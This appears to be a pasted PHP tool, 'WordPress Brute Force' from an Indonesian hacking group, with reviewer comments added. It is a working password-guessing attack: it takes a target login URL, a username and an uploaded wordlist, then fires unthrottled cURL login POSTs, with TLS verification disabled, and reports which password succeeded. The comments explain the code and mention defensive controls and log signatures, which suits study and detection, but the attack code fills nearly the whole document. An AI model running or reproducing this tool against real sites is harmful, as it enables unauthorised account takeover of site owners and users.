GLADzTeguhID

WordPress Bruteforce

Jan 26th, 2017
PHP 3.51 KB | None | 0 0
  1. <?php
  2. // ============================= //
  3. # WordPress Brute Force
  4. # Created by Lyonc
  5. # Garuda Security Hacker
  6. # Can Use On Localhost / cPanel
  7. // ============================= //
  8.  
  9. error_reporting(0);
      // Every PHP error, warning and notice is silenced from here on, so failures
      // in the code below (missing POST keys, failed file operations) leave no
      // message in the page output.
  10.  
  11. $logurl = $_POST['logurl'];
  12. $user = $_POST['tguser'];
      // Both values come straight from the request body: no isset() check, no
      // validation, no allow-list. $logurl later becomes the cURL target inside
      // logwp(), so whoever can reach this page decides which URL the hosting
      // server sends requests to. Nothing in this file authenticates the caller.
  13.  
  14. echo '<head>
  15. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  16. <title>WordPress Brute Force</title>
  17. </head>
  18. <body>
  19. <center>
  20. ';
  21.  
      // Attempt branch: taken when the form was submitted with a URL, a user
      // name and an upload whose reported size is not 0.
      // NOTE(review): seen from the site being targeted, this branch produces a
      // run of login POSTs for one account with no pause between them;
      // per-account / per-source attempt limits and a second factor on the login
      // are the usual controls. Nothing in this file shows what the target has.
  22. if(isset($_POST['startbf']) && !empty($logurl) && !empty($user) && $_FILES['netfile']['size'] !== 0){
  23. $textkskc = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123457890';
  24. $panj = 15;
  25. $txtl = strlen($textkskc)-1;
  26. $uploadz = '';
  27. for($i=1; $i<=$panj; $i++){
  28. $uploadz .= $textkskc[rand(0, $txtl)];
  29. }
      // $uploadz is now a 15-character name drawn from a 61-symbol alphabet (the
      // digit 6 is absent) with rand(), which is not a cryptographically secure
      // generator. The name has no directory part and no extension.
  30. if(move_uploaded_file($_FILES['netfile']['tmp_name'], $uploadz)){
  31. $passlists = file_get_contents($uploadz);
  32. unlink($uploadz);
      // The uploaded list is moved to that relative path, read fully into memory
      // and deleted again straight away, so on disk it exists only briefly.
  33. }else{
  34. $passlists = '';
  35. }
  36. $listspass = explode("\n", $passlists);
      // One candidate per "\n"-separated line of the upload.
  37. if(isset($_POST['brift'])){
      // "Break If True" was ticked: stop at the first candidate logwp() accepts.
      // Neither loop has a delay, attempt cap or back-off between requests.
  38. foreach($listspass as $pass){
  39. if(logwp($logurl, urlencode($user), urlencode($pass))){
      // The candidate is HTML-escaped before being echoed. "Berhasil" is
      // Indonesian for "succeeded", "Gagal" for "failed".
  40. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">Berhasil</font><br/>'."\n";
  41. break;
  42. }else{
  43. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">Gagal :(</font><br/>'."\n";
  44. }
  45. }
  46. }else{
      // Checkbox not ticked: every candidate in the list is submitted, whether or
      // not an earlier one was reported as accepted.
  47. foreach($listspass as $pass){
  48. if(logwp($logurl, urlencode($user), urlencode($pass))){
  49. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">Berhasil Bos !!!</font><br/>'."\n";
  50. }else{
  51. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">Gagal</font><br/>'."\n";
  52. }
  53. }
  54. }
  55. }else{
      // Form branch: renders the upload form. Both text inputs ("logurl" and
      // "tguser") are pre-filled from $user, HTML-escaped; $logurl is not echoed.
  56. echo '<form method="post" enctype="multipart/form-data">
  57. <b><font size="6" color="indigo">WordPress Brute Force</font></b><br/>
  58. <font color="gray">Work On cPanel And Localhost</font><br/>
  59. <b>Login Url</b><br/>
  60. <input type="text" size="40" name="logurl" placeholder="Login Url" value="'.htmlspecialchars($user).'"><br/>
  61. <b>Username</b><br/>
  62. <input type="text" size="40" name="tguser" placeholder="Username" value="'.htmlspecialchars($user).'"><br/>
  63. <b>Password Lists</b><br/>
  64. <input type="file" name="netfile"><br/>
  65. <input type="checkbox" name="brift" value="Break If True"><font color="blue">Break If True</font><br/>
  66. <input type="submit" name="startbf" value="START">
  67. </form>
  68. ';
  69. }
  70.  
  71. echo '</center>
  72. </body>';
  73.  
  74. function logwp($urllgz, $login_email, $login_pass){
      // Sends one login POST to the given URL and reports whether the response
      // body contains a fixed marker string.
      //   $urllgz      - target URL; anything from '?redirect_to=' onward is cut.
      //   $login_email - placed as-is into the 'log' field; the callers in this
      //                  file pass it through urlencode() first.
      //   $login_pass  - placed as-is into the 'pwd' field; same as above.
      // Returns TRUE when the marker is found, FALSE otherwise. Ends the whole
      // script through die() when curl_exec() gives a falsy result.
  75. $urllgm = explode('?redirect_to=', $urllgz);
  76. $urllg = $urllgm[0];
  77. $cookielog = 'gsh_cookie';
  78. $fp = fopen($cookielog, 'w');
  79. fwrite($fp, '');
  80. fclose($fp);
      // A file literally named 'gsh_cookie' (relative path) is created or
      // truncated on every call; fopen()'s return value is not checked. Nothing
      // in this file deletes it afterwards, so it stays behind as an on-disk
      // artifact wherever the script runs.
  81. $ch = curl_init();
  82. curl_setopt($ch, CURLOPT_URL, $urllg);
      // The request body always has the same three fields: log, pwd and
      // login=Log%20In.
  83. curl_setopt($ch, CURLOPT_POSTFIELDS, 'log='.$login_email.'&pwd='.$login_pass.'&login=Log%20In');
  84. curl_setopt($ch, CURLOPT_POST, 1);
  85. curl_setopt($ch, CURLOPT_HEADER, 0);
      // Redirects are followed, so $page below is the body of the final response.
  86. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  87. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookielog);
  88. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookielog);
      // Peer certificate verification is switched off, so the TLS endpoint is not
      // authenticated even though the host-name check is left at 2.
  89. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  90. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  91. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      // User-Agent is a hard-coded string and Referer is set to the target URL
      // itself. Both are identical on every request this function sends, which
      // makes them usable match fields in web-server or WAF logs.
  92. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3');
  93. curl_setopt($ch, CURLOPT_REFERER, $urllg);
      // The cURL handle is never closed in this function.
  94. $page = curl_exec($ch) or die('<font color="red">Can\'t Connect to Host</font>');
      // eregi() is a case-insensitive POSIX regex match; the pattern is the
      // quoted selector text, in which '.' matches any character. eregi() was
      // removed in PHP 7.0, so as written this function runs only on PHP 5.x.
  95. if(eregi('\'#dashboard_stats div.dashboard-widget-content\'', $page)){
  96. return TRUE;
  97. }else{
  98. return FALSE;
  99. }
  100. }
  101. ?>